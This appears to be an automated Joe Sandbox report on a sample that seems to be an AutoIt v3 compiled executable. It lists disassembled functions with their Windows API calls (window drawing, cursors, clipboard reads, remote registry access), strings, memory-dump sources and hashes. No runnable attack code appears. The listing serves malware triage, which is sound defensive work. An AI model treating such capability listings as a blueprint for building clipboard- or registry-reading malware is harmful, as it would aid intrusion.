                                                              • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                              • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                              • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                            • String ID:
                                                            • API String ID: 69173610-0
                                                            • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                            • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                            Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                            Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-3360698832
                                                            • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                            • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                            Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load
                                                            • String ID:
                                                            • API String ID: 1675784387-0
                                                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                            Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1582027408-0
                                                            • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                            • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                            Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3217815495-966354055
                                                            • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                            • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                            Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                            • String ID: ($,$tooltips_class32
                                                            • API String ID: 225202481-3320066284
                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                            Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                            Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                            • GetClientRect.USER32(?,?), ref: 00471D05
                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                            • GetClientRect.USER32(?,?), ref: 00471E8A
                                                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                            • String ID: @$AutoIt v3 GUI
                                                            • API String ID: 867697134-3359773793
                                                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                            Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$__wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                            • API String ID: 790654849-32604322
                                                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                            Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
